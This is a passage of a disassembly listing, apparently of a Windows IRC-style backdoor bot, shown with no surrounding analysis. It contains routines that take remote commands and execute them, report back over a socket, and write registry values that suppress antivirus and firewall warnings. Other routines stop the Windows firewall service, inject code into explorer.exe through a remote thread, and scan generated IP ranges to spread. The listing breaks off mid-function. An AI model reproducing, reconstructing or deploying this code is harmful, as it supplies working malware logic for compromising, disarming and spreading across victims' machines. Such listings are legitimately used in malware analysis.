cmp [ebp+var_420], 71h
jz loc_60341C
cmp [ebp+var_420], 75h
jz loc_6032E1
jmp locret_603433
; ---------------------------------------------------------------------------
loc_6031A4: ; CODE XREF: sub_6030CA+73�j
push 0
push 5
push offset aQuit ; "QUiT\n"
push dword_601540
call dword_601130 ; send
push dword_601540
call dword_601140 ; closesocket
call sub_602804
jmp locret_603433
; ---------------------------------------------------------------------------
loc_6031CF: ; CODE XREF: sub_6030CA+66�j
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax+1]
cmp eax, 20h
jnz loc_603294
mov eax, [ebp+arg_0]
inc eax
inc eax
mov [ebp+var_40C], eax
and [ebp+var_408], 0
and [ebp+var_404], 0
jmp short loc_603208
; ---------------------------------------------------------------------------
loc_6031FA: ; CODE XREF: sub_6030CA+1AB�j
mov eax, [ebp+var_408]
inc eax
inc eax
mov [ebp+var_408], eax
loc_603208: ; CODE XREF: sub_6030CA+12E�j
mov eax, [ebp+var_40C]
add eax, [ebp+var_408]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_603277
mov eax, [ebp+var_40C]
add eax, [ebp+var_408]
movsx eax, byte ptr [eax+1]
test eax, eax
jz short loc_603277
mov eax, [ebp+var_40C]
add eax, [ebp+var_408]
movsx eax, byte ptr [eax]
sub eax, 3Ah
imul eax, 24h
movsx eax, al
mov ecx, [ebp+var_40C]
add ecx, [ebp+var_408]
movsx ecx, byte ptr [ecx+1]
lea eax, [eax+ecx-3Ah]
mov ecx, [ebp+var_404]
mov [ebp+ecx+var_400], al
mov eax, [ebp+var_404]
inc eax
mov [ebp+var_404], eax
jmp short loc_6031FA
; ---------------------------------------------------------------------------
loc_603277: ; CODE XREF: sub_6030CA+14F�j
; sub_6030CA+163�j
mov eax, [ebp+var_404]
mov [ebp+eax+var_400], 0
push [ebp+arg_4]
lea eax, [ebp+var_400]
push eax
call sub_6030CA
loc_603294: ; CODE XREF: sub_6030CA+10F�j
jmp locret_603433
; ---------------------------------------------------------------------------
loc_603299: ; CODE XREF: sub_6030CA+9B�j
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax+1]
cmp eax, 20h
jnz short loc_6032DC
mov eax, [ebp+arg_0]
inc eax
inc eax
push eax
push offset a_500s ; "%.500s\n"
push offset dword_601278
call dword_6010F4 ; wsprintfA
add esp, 0Ch
mov dword_6014AC, eax
push 0
push dword_6014AC
push offset dword_601278
push dword_601540
call dword_601130 ; send
loc_6032DC: ; CODE XREF: sub_6030CA+1D9�j
jmp locret_603433
; ---------------------------------------------------------------------------
loc_6032E1: ; CODE XREF: sub_6030CA+7C�j
; sub_6030CA+CF�j
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax+1]
cmp eax, 20h
jnz short loc_60330A
push [ebp+arg_4]
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
sub eax, 75h
neg eax
sbb eax, eax
inc eax
push eax
mov eax, [ebp+arg_0]
inc eax
inc eax
push eax
call sub_6048A6
loc_60330A: ; CODE XREF: sub_6030CA+221�j
jmp locret_603433
; ---------------------------------------------------------------------------
loc_60330F: ; CODE XREF: sub_6030CA+A8�j
mov eax, [ebp+arg_4]
mov dword_6016FC, eax
call sub_603AF7
jmp locret_603433
; ---------------------------------------------------------------------------
loc_603321: ; CODE XREF: sub_6030CA+59�j
mov eax, [ebp+arg_4]
mov dword_6016FC, eax
call sub_603B3C
jmp locret_603433
; ---------------------------------------------------------------------------
loc_603333: ; CODE XREF: sub_6030CA+25�j
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax+1]
sub eax, 20h
mov ecx, [ebp+arg_0]
inc ecx
inc ecx
neg eax
sbb eax, eax
not eax
and eax, ecx
push eax
call sub_604422
jmp locret_603433
; ---------------------------------------------------------------------------
loc_603355: ; CODE XREF: sub_6030CA+4C�j
call sub_6044C3
jmp locret_603433
; ---------------------------------------------------------------------------
loc_60335F: ; CODE XREF: sub_6030CA+B5�j
push 10h
push dword_601538
call dword_601118 ; inet_ntoa
push eax
lea eax, [ebp+var_41C]
push eax
call dword_6010CC ; lstrcpynA
push dword_60153C
call dword_601118 ; inet_ntoa
push eax
lea eax, [ebp+var_41C]
push eax
push offset aNi_16s_16s ; "[ni] %.16s %.16s"
push offset dword_601278
call dword_6010F4 ; wsprintfA
add esp, 10h
push offset dword_601278
call sub_602CF3
jmp locret_603433
; ---------------------------------------------------------------------------
loc_6033B1: ; CODE XREF: sub_6030CA+3F�j
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax+1]
cmp eax, 20h
jnz short loc_6033FC
push offset aD ; "d"
push offset dword_601680
push 0
push 0
push 28h
push 0
push 0
push 0
mov eax, [ebp+arg_0]
inc eax
inc eax
push eax
push 0
call dword_6010B4 ; CreateProcessA
cmp eax, 1
jnz short loc_6033F2
push offset aExec_0 ; "[exec] :)"
call sub_602CF3
jmp short loc_6033FC
; ---------------------------------------------------------------------------
loc_6033F2: ; CODE XREF: sub_6030CA+31A�j
push offset aExec ; "[exec] :("
call sub_602CF3
loc_6033FC: ; CODE XREF: sub_6030CA+32�j
; sub_6030CA+2F1�j ...
call sub_603ABE
jmp short locret_603433
; ---------------------------------------------------------------------------
loc_603403: ; CODE XREF: sub_6030CA+8E�j
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax+1]
cmp eax, 20h
jnz short loc_60341A
mov eax, [ebp+arg_0]
inc eax
inc eax
push eax
call sub_6041F5
loc_60341A: ; CODE XREF: sub_6030CA+343�j
jmp short locret_603433
; ---------------------------------------------------------------------------
loc_60341C: ; CODE XREF: sub_6030CA+C2�j
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax+1]
cmp eax, 20h
jnz short locret_603433
mov eax, [ebp+arg_0]
inc eax
inc eax
push eax
call sub_603FC5
locret_603433: ; CODE XREF: sub_6030CA+82�j
; sub_6030CA+D5�j ...
leave
retn 8
sub_6030CA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_603437 proc near ; CODE XREF: sub_602D3E+236�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, [ebp+arg_0]
mov [ebp+var_8], eax
loc_603442: ; CODE XREF: sub_603437+71�j
push 7Ch
push [ebp+var_8]
call sub_603A00
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_603462
mov eax, [ebp+var_4]
mov byte ptr [eax], 0
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_603462: ; CODE XREF: sub_603437+1C�j
mov eax, [ebp+var_8]
movsx eax, byte ptr [eax]
movsx ecx, byte_6017A6
cmp eax, ecx
jnz short loc_603481
push 0
mov eax, [ebp+var_8]
inc eax
push eax
call sub_6030CA
jmp short loc_60349E
; ---------------------------------------------------------------------------
loc_603481: ; CODE XREF: sub_603437+3A�j
mov eax, [ebp+var_8]
movsx eax, byte ptr [eax]
movsx ecx, byte_6017A7
cmp eax, ecx
jnz short loc_60349E
push 1
mov eax, [ebp+var_8]
inc eax
push eax
call sub_6030CA
loc_60349E: ; CODE XREF: sub_603437+48�j
; sub_603437+59�j
mov eax, [ebp+var_4]
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jnz short loc_603442
leave
retn 4
sub_603437 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_6034AE proc near ; CODE XREF: sub_602928+148�p
; sub_602D3E+182�p
push ebp
mov ebp, esp
call dword_6010B0 ; GetTickCount
push eax
push offset dword_6017EC
push offset a_8s08x ; "%.8s%08x"
push offset dword_601478
call dword_6010F4 ; wsprintfA
add esp, 10h
pop ebp
retn
sub_6034AE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_6034D2 proc near ; CODE XREF: sub_60266C+E�p
var_148 = dword ptr -148h
var_144 = byte ptr -144h
var_128 = dword ptr -128h
var_124 = byte ptr -124h
var_123 = byte ptr -123h
var_122 = word ptr -122h
var_120 = word ptr -120h
var_11E = word ptr -11Eh
var_11C = dword ptr -11Ch
var_118 = byte ptr -118h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 148h
mov [ebp+var_8], offset aN ; "n"
mov [ebp+var_148], 1
and [ebp+var_128], 0
mov [ebp+var_124], 2
mov [ebp+var_123], 0
mov [ebp+var_122], 8
and [ebp+var_120], 0
and [ebp+var_11E], 0
push 0
lea eax, [ebp+var_124]
push eax
push 0
push 0
push 4
push 6
call dword_6010A0 ; GetCurrentProcess
push eax
call dword_601030 ; SetSecurityInfo
lea eax, [ebp+var_C]
push eax
push offset aSoftwareMicros ; "software\\microsoft\\ole"
push 80000002h
call dword_60102C ; RegCreateKeyA
push 2
push [ebp+var_8]
push 1
push 0
push offset aEnabledcom ; "enabledcom"
push [ebp+var_C]
call dword_601028 ; RegSetValueExA
push [ebp+var_C]
call dword_601024 ; RegCloseKey
lea eax, [ebp+var_C]
push eax
push offset aSystemCurrentc ; "system\\currentcontrolset\\control\\lsa"
push 80000002h
call dword_60102C ; RegCreateKeyA
push 4
lea eax, [ebp+var_148]
push eax
push 4
push 0
push offset aRestrictanonym ; "restrictanonymous"
push [ebp+var_C]
call dword_601028 ; RegSetValueExA
push 4
lea eax, [ebp+var_148]
push eax
push 4
push 0
push offset aRestrictanon_0 ; "restrictanonymoussam"
push [ebp+var_C]
call dword_601028 ; RegSetValueExA
push [ebp+var_C]
call dword_601024 ; RegCloseKey
lea eax, [ebp+var_C]
push eax
push offset aSystemCurren_0 ; "system\\currentcontrolset\\services\\lanma"...
push 80000002h
call dword_60102C ; RegCreateKeyA
push 4
lea eax, [ebp+var_128]
push eax
push 4
push 0
push offset aAutoshareserve ; "autoshareserver"
push [ebp+var_C]
call dword_601028 ; RegSetValueExA
push 4
lea eax, [ebp+var_128]
push eax
push 4
push 0
push offset aAutosharewks ; "autosharewks"
push [ebp+var_C]
call dword_601028 ; RegSetValueExA
push [ebp+var_C]
call dword_601024 ; RegCloseKey
lea eax, [ebp+var_C]
push eax
push offset aSoftwareMicr_0 ; "software\\microsoft\\security center"
push 80000002h
call dword_60102C ; RegCreateKeyA
push 4
lea eax, [ebp+var_148]
push eax
push 4
push 0
push offset aAntivirusdisab ; "antivirusdisablenotify"
push [ebp+var_C]
call dword_601028 ; RegSetValueExA
push 4
lea eax, [ebp+var_148]
push eax
push 4
push 0
push offset aAntivirusoverr ; "antivirusoverride"
push [ebp+var_C]
call dword_601028 ; RegSetValueExA
push 4
lea eax, [ebp+var_148]
push eax
push 4
push 0
push offset aFirewalldisabl ; "firewalldisablenotify"
push [ebp+var_C]
call dword_601028 ; RegSetValueExA
push 4
lea eax, [ebp+var_148]
push eax
push 4
push 0
push offset aFirewalldisa_0 ; "firewalldisableoverride"
push [ebp+var_C]
call dword_601028 ; RegSetValueExA
push [ebp+var_C]
call dword_601024 ; RegCloseKey
lea eax, [ebp+var_C]
push eax
push offset aSoftwarePolici ; "software\\policies\\microsoft\\windowsfire"...
push 80000002h
call dword_60102C ; RegCreateKeyA
push 4
lea eax, [ebp+var_128]
push eax
push 4
push 0
push offset aEnablefirewall ; "enablefirewall"
push [ebp+var_C]
call dword_601028 ; RegSetValueExA
push [ebp+var_C]
call dword_601024 ; RegCloseKey
lea eax, [ebp+var_C]
push eax
push offset aSoftwarePoli_0 ; "software\\policies\\microsoft\\windowsfire"...
push 80000002h
call dword_60102C ; RegCreateKeyA
push 4
lea eax, [ebp+var_128]
push eax
push 4
push 0
push offset aEnablefirewall ; "enablefirewall"
push [ebp+var_C]
call dword_601028 ; RegSetValueExA
push [ebp+var_C]
call dword_601024 ; RegCloseKey
push 104h
lea eax, [ebp+var_118]
push eax
call dword_6010A4 ; GetWindowsDirectoryA
lea eax, [ebp+var_118]
push eax
push offset aSDebugDcpromo_ ; "%s\\debug\\dcpromo.log"
lea eax, [ebp+var_118]
push eax
call dword_6010F4 ; wsprintfA
add esp, 0Ch
push 1
lea eax, [ebp+var_118]
push eax
call dword_6010A8 ; _lcreat
push eax
call dword_6010AC ; _lclose
push 1
lea eax, [ebp+var_118]
push eax
call dword_6010D4 ; SetFileAttributesA
push 22h
push 0
push 0
call dword_601008 ; OpenSCManagerA
mov [ebp+var_4], eax
push 22h
push offset aSharedaccess ; "sharedaccess"
push [ebp+var_4]
call dword_601004 ; OpenServiceA
mov [ebp+var_11C], eax
lea eax, [ebp+var_144]
push eax
push 1
push [ebp+var_11C]
call dword_601020 ; ControlService
push 0
push 0
push 0
push 0
push 0
push 0
push 0
push 0FFFFFFFFh
push 4
push 0FFFFFFFFh
push [ebp+var_11C]
call dword_60101C ; ChangeServiceConfigA
push [ebp+var_11C]
call dword_60100C ; CloseServiceHandle
push [ebp+var_4]
call dword_60100C ; CloseServiceHandle
leave
retn
sub_6034D2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_6037CF proc near ; CODE XREF: sub_60266C+9�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
and [ebp+var_4], 0
jmp short loc_6037E1
; ---------------------------------------------------------------------------
loc_6037DA: ; CODE XREF: sub_6037CF+63�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_6037E1: ; CODE XREF: sub_6037CF+9�j
cmp [ebp+var_4], 6
jnb short loc_603834
push offset aWinsvcmon_0 ; "winsvcmon"
push 0
push 1F0001h
call dword_60104C ; OpenMutexA
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jnz short loc_60381E
call dword_601048 ; RtlGetLastWin32Error
cmp eax, 2
jnz short loc_60381E
push offset aWinsvcmon_0 ; "winsvcmon"
push 1
push 0
call dword_601044 ; CreateMutexA
jmp short locret_60383C
; ---------------------------------------------------------------------------
loc_60381E: ; CODE XREF: sub_6037CF+31�j
; sub_6037CF+3C�j
push [ebp+var_8]
call dword_601070 ; CloseHandle
push 1400h
call dword_6010E0 ; Sleep
jmp short loc_6037DA
; ---------------------------------------------------------------------------
loc_603834: ; CODE XREF: sub_6037CF+16�j
push 0
call dword_6010C0 ; ExitProcess
locret_60383C: ; CODE XREF: sub_6037CF+4D�j
leave
retn
sub_6037CF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_60383E proc near ; CODE XREF: sub_6026A5+7F�p
; sub_602804+48�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 0Ch
call dword_6010A0 ; GetCurrentProcess
mov [ebp+var_8], eax
mov eax, dword_601064
mov dword_6016D1, eax
mov eax, dword_601070
mov dword_6016DD, eax
mov eax, dword_601060
mov dword_6016E4, eax
mov eax, dword_6010C0
mov dword_6016ED, eax
push offset aD ; "d"
push offset dword_601680
push 0
push 0
push 44h
push 0
push 0
push 0
push offset aExplorer_exe ; "explorer.exe"
push 0
call dword_6010B4 ; CreateProcessA
push 2
push 0
push 0
lea eax, [ebp+var_C]
push eax
push dword ptr aD ; "d"
push [ebp+var_8]
push [ebp+var_8]
call dword_60105C ; DuplicateHandle
mov eax, [ebp+var_C]
mov dword_6016CC, eax
mov eax, [ebp+var_C]
mov dword_6016D8, eax
push 4
push 1000h
push 138h
push 0
push dword ptr aD ; "d"
call dword_601058 ; VirtualAllocEx
mov [ebp+var_4], eax
push 0
push 34h
push offset loc_6016C4
push [ebp+var_4]
push dword ptr aD ; "d"
call dword_601054 ; WriteProcessMemory
push 0
push 104h
push offset aCM_unpackerPac ; "C:\\m_unpacker\\packed.exe"
mov eax, [ebp+var_4]
add eax, 34h
push eax
push dword ptr aD ; "d"
call dword_601054 ; WriteProcessMemory
push 0
push 0
push 0
push [ebp+var_4]
push 0
push 0
push dword ptr aD ; "d"
call dword_601050 ; CreateRemoteThread
push 0
call dword_6010C0 ; ExitProcess
leave
retn
sub_60383E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_60393B proc near ; CODE XREF: sub_60424F+6B�p
; sub_604422+52�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, [ebp+arg_0]
mov [ebp+var_4], eax
and [ebp+var_8], 0
jmp short loc_603953
; ---------------------------------------------------------------------------
loc_60394C: ; CODE XREF: sub_60393B+3B�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_603953: ; CODE XREF: sub_60393B+F�j
mov eax, [ebp+var_4]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_603978
mov eax, [ebp+var_8]
imul eax, 0Ah
mov [ebp+var_8], eax
mov eax, [ebp+var_4]
movzx eax, byte ptr [eax]
mov ecx, [ebp+var_8]
lea eax, [ecx+eax-30h]
mov [ebp+var_8], eax
jmp short loc_60394C
; ---------------------------------------------------------------------------
loc_603978: ; CODE XREF: sub_60393B+20�j
mov eax, [ebp+var_8]
leave
retn 4
sub_60393B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_60397F proc near ; CODE XREF: sub_602853+2A�p
; sub_60424F+13E�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
jmp short loc_603990
; ---------------------------------------------------------------------------
loc_603989: ; CODE XREF: sub_60397F+22�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_603990: ; CODE XREF: sub_60397F+8�j
mov eax, [ebp+var_4]
cmp eax, [ebp+arg_4]
jnb short locret_6039A3
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
mov byte ptr [eax], 0
jmp short loc_603989
; ---------------------------------------------------------------------------
locret_6039A3: ; CODE XREF: sub_60397F+17�j
leave
retn 8
sub_60397F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_6039A7 proc near ; CODE XREF: sub_604CA5+64�p
; sub_604D9C+42�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
jmp short loc_6039B8
; ---------------------------------------------------------------------------
loc_6039B1: ; CODE XREF: sub_6039A7+24�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_6039B8: ; CODE XREF: sub_6039A7+8�j
mov eax, [ebp+var_4]
cmp eax, [ebp+arg_4]
jnb short locret_6039CD
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
mov cl, [ebp+arg_8]
mov [eax], cl
jmp short loc_6039B1
; ---------------------------------------------------------------------------
locret_6039CD: ; CODE XREF: sub_6039A7+17�j
leave
retn 0Ch
sub_6039A7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_6039D1 proc near ; CODE XREF: sub_602928+32C�p
; sub_60401F+18�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
jmp short loc_6039E2
; ---------------------------------------------------------------------------
loc_6039DB: ; CODE XREF: sub_6039D1+29�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_6039E2: ; CODE XREF: sub_6039D1+8�j
mov eax, [ebp+var_4]
cmp eax, [ebp+arg_8]
jnb short locret_6039FC
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
mov ecx, [ebp+arg_4]
add ecx, [ebp+var_4]
mov cl, [ecx]
mov [eax], cl
jmp short loc_6039DB
; ---------------------------------------------------------------------------
locret_6039FC: ; CODE XREF: sub_6039D1+17�j
leave
retn 0Ch
sub_6039D1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_603A00 proc near ; CODE XREF: sub_602928+2DB�p
; sub_602D3E+1D�p ...
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
loc_603A03: ; CODE XREF: sub_603A00:loc_603A29�j
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_603A2B
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
movsx ecx, [ebp+arg_4]
cmp eax, ecx
jnz short loc_603A22
mov eax, [ebp+arg_0]
jmp short loc_603A2D
; ---------------------------------------------------------------------------
jmp short loc_603A29
; ---------------------------------------------------------------------------
loc_603A22: ; CODE XREF: sub_603A00+19�j
mov eax, [ebp+arg_0]
inc eax
mov [ebp+arg_0], eax
loc_603A29: ; CODE XREF: sub_603A00+20�j
jmp short loc_603A03
; ---------------------------------------------------------------------------
loc_603A2B: ; CODE XREF: sub_603A00+B�j
xor eax, eax
loc_603A2D: ; CODE XREF: sub_603A00+1E�j
pop ebp
retn 8
sub_603A00 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_603A31 proc near ; CODE XREF: sub_6044D2+288�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
mov eax, [ebp+arg_0]
mov [ebp+var_4], eax
mov eax, [ebp+arg_4]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_603A52
mov eax, [ebp+var_4]
jmp short locret_603ABA
; ---------------------------------------------------------------------------
loc_603A52: ; CODE XREF: sub_603A31+1A�j
jmp short loc_603A5B
; ---------------------------------------------------------------------------
loc_603A54: ; CODE XREF: sub_603A31+44�j
; sub_603A31+85�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_603A5B: ; CODE XREF: sub_603A31:loc_603A52�j
mov eax, [ebp+var_4]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_603AB8
mov eax, [ebp+var_4]
movsx eax, byte ptr [eax]
mov ecx, [ebp+var_C]
movsx ecx, byte ptr [ecx]
cmp eax, ecx
jz short loc_603A77
jmp short loc_603A54
; ---------------------------------------------------------------------------
loc_603A77: ; CODE XREF: sub_603A31+42�j
mov eax, [ebp+var_4]
mov [ebp+var_8], eax
loc_603A7D: ; CODE XREF: sub_603A31:loc_603AAE�j
mov eax, [ebp+var_C]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_603A8E
mov eax, [ebp+var_4]
jmp short locret_603ABA
; ---------------------------------------------------------------------------
jmp short loc_603AAE
; ---------------------------------------------------------------------------
loc_603A8E: ; CODE XREF: sub_603A31+54�j
mov eax, [ebp+var_C]
movsx eax, byte ptr [eax]
mov ecx, [ebp+var_8]
movsx ecx, byte ptr [ecx]
mov edx, [ebp+var_C]
inc edx
mov [ebp+var_C], edx
mov edx, [ebp+var_8]
inc edx
mov [ebp+var_8], edx
cmp ecx, eax
jz short loc_603AAE
jmp short loc_603AB0
; ---------------------------------------------------------------------------
loc_603AAE: ; CODE XREF: sub_603A31+5B�j
; sub_603A31+79�j
jmp short loc_603A7D
; ---------------------------------------------------------------------------
loc_603AB0: ; CODE XREF: sub_603A31+7B�j
mov eax, [ebp+arg_4]
mov [ebp+var_C], eax
jmp short loc_603A54
; ---------------------------------------------------------------------------
loc_603AB8: ; CODE XREF: sub_603A31+32�j
xor eax, eax
locret_603ABA: ; CODE XREF: sub_603A31+1F�j
; sub_603A31+59�j
leave
retn 8
sub_603A31 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_603ABE proc near ; CODE XREF: sub_602928+9�p
; sub_6030CA:loc_6033FC�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
and [ebp+var_8], 0
push offset aDnsapi_dll ; "dnsapi.dll"
call dword_60106C ; LoadLibraryA
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short locret_603AF5
push offset aDnsflushresolv ; "DnsFlushResolverCache"
push [ebp+var_4]
call dword_601068 ; GetProcAddress
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz short locret_603AF5
call [ebp+var_8]
locret_603AF5: ; CODE XREF: sub_603ABE+1B�j
; sub_603ABE+32�j
leave
retn
sub_603ABE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_603AF7 proc near ; CODE XREF: sub_602D3E:loc_603022�p
; sub_6030CA+24D�p
push ebp
mov ebp, esp
cmp dword_601700, 1
jnz short loc_603B3A
and dword_601700, 0
push 0
push 0
push 8B00h
push offset sub_603B4B
push 0
push 0
call dword_6010C4 ; CreateThread
push 0
push 0
push 18B00h
push offset sub_603B4B
push 0
push 0
call dword_6010C4 ; CreateThread
loc_603B3A: ; CODE XREF: sub_603AF7+A�j
pop ebp
retn
sub_603AF7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_603B3C proc near ; CODE XREF: sub_6030CA+25F�p
push ebp
mov ebp, esp
mov dword_601700, 1
pop ebp
retn
sub_603B3C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_603B4B proc near ; DATA XREF: sub_603AF7+1C�o
; sub_603AF7+34�o
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1Ch
push esi
call dword_6010B0 ; GetTickCount
mov esi, eax
call dword_6010DC ; GetCurrentThreadId
xor esi, eax
mov [ebp+var_1C], esi
cmp dword_60153C, 0FFFFFFFFh
jnz short loc_603B79
mov eax, [ebp+var_1C]
shl eax, 10h
mov [ebp+var_14], eax
jmp short loc_603B92
; ---------------------------------------------------------------------------
loc_603B79: ; CODE XREF: sub_603B4B+21�j
movzx eax, byte ptr dword_60153C
shl eax, 18h
movzx ecx, byte ptr dword_60153C+1
shl ecx, 10h
or eax, ecx
mov [ebp+var_14], eax
loc_603B92: ; CODE XREF: sub_603B4B+2C�j
mov eax, [ebp+arg_0]
shr eax, 10h
jnz short loc_603BAA
mov [ebp+var_18], 0FFFF0000h
mov [ebp+var_4], 0FF00h
jmp short loc_603BB8
; ---------------------------------------------------------------------------
loc_603BAA: ; CODE XREF: sub_603B4B+4D�j
mov [ebp+var_18], 0FF000000h
mov [ebp+var_4], 0FFFF00h
loc_603BB8: ; CODE XREF: sub_603B4B+5D�j
mov eax, [ebp+arg_0]
and eax, 0FFFFh
mov word ptr [ebp+var_8], ax
loc_603BC4: ; CODE XREF: sub_603B4B+E7�j
cmp dword_601700, 0
jnz short loc_603C34
mov eax, [ebp+var_14]
and eax, [ebp+var_18]
mov ecx, [ebp+var_1C]
and ecx, [ebp+var_4]
or eax, ecx
mov [ebp+var_10], eax
push 400h
call dword_6010E0 ; Sleep
mov eax, [ebp+var_10]
mov [ebp+var_C], eax
jmp short loc_603BFA
; ---------------------------------------------------------------------------
loc_603BF1: ; CODE XREF: sub_603B4B+D2�j
mov eax, [ebp+var_C]
add eax, 20h
mov [ebp+var_C], eax
loc_603BFA: ; CODE XREF: sub_603B4B+A4�j
mov eax, [ebp+var_10]
add eax, 100h
cmp [ebp+var_C], eax
jnb short loc_603C1F
push [ebp+var_8]
push [ebp+var_C]
call sub_603C3B
push 200h
call dword_6010E0 ; Sleep
jmp short loc_603BF1
; ---------------------------------------------------------------------------
loc_603C1F: ; CODE XREF: sub_603B4B+BA�j
call dword_6010B0 ; GetTickCount
mov esi, eax
call dword_6010DC ; GetCurrentThreadId
xor esi, eax
mov [ebp+var_1C], esi
jmp short loc_603BC4
; ---------------------------------------------------------------------------
loc_603C34: ; CODE XREF: sub_603B4B+80�j
xor eax, eax
pop esi
leave
retn 4
sub_603B4B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_603C3B proc near ; CODE XREF: sub_603B4B+C2�p
var_2C4 = dword ptr -2C4h
var_2C0 = dword ptr -2C0h
var_2BC = dword ptr -2BCh
var_2B8 = word ptr -2B8h
var_2B6 = word ptr -2B6h
var_2B4 = dword ptr -2B4h
var_2A8 = dword ptr -2A8h
var_2A4 = dword ptr -2A4h
var_2A0 = dword ptr -2A0h
var_29C = dword ptr -29Ch
var_194 = dword ptr -194h
var_190 = dword ptr -190h
var_18C = dword ptr -18Ch
var_88 = dword ptr -88h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = word ptr 0Ch
push ebp
mov ebp, esp
sub esp, 2C4h
mov [ebp+var_2BC], 1
and [ebp+var_2A0], 0
and [ebp+var_190], 0
mov [ebp+var_2B8], 2
mov ax, [ebp+arg_4]
mov [ebp+var_2B6], ax
and [ebp+var_2A8], 0
and [ebp+var_2A4], 0
and [ebp+var_4], 0
jmp short loc_603C8B
; ---------------------------------------------------------------------------
loc_603C84: ; CODE XREF: sub_603C3B+194�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_603C8B: ; CODE XREF: sub_603C3B+47�j
cmp [ebp+var_4], 20h
jge loc_603DD4
push 6
push 1
push 2
call dword_601124 ; socket
mov ecx, [ebp+var_4]
mov [ebp+ecx*4+var_88], eax
lea eax, [ebp+var_2BC]
push eax
push 8004667Eh
mov eax, [ebp+var_4]
push [ebp+eax*4+var_88]
call dword_60110C ; ioctlsocket
loc_603CC7: ; CODE XREF: sub_603C3B+10A�j
and [ebp+var_2C0], 0
jmp short loc_603CDD
; ---------------------------------------------------------------------------
loc_603CD0: ; CODE XREF: sub_603C3B:loc_603D06�j
mov eax, [ebp+var_2C0]
inc eax
mov [ebp+var_2C0], eax
loc_603CDD: ; CODE XREF: sub_603C3B+93�j
mov eax, [ebp+var_2C0]
cmp eax, [ebp+var_2A0]
jnb short loc_603D08
mov eax, [ebp+var_2C0]
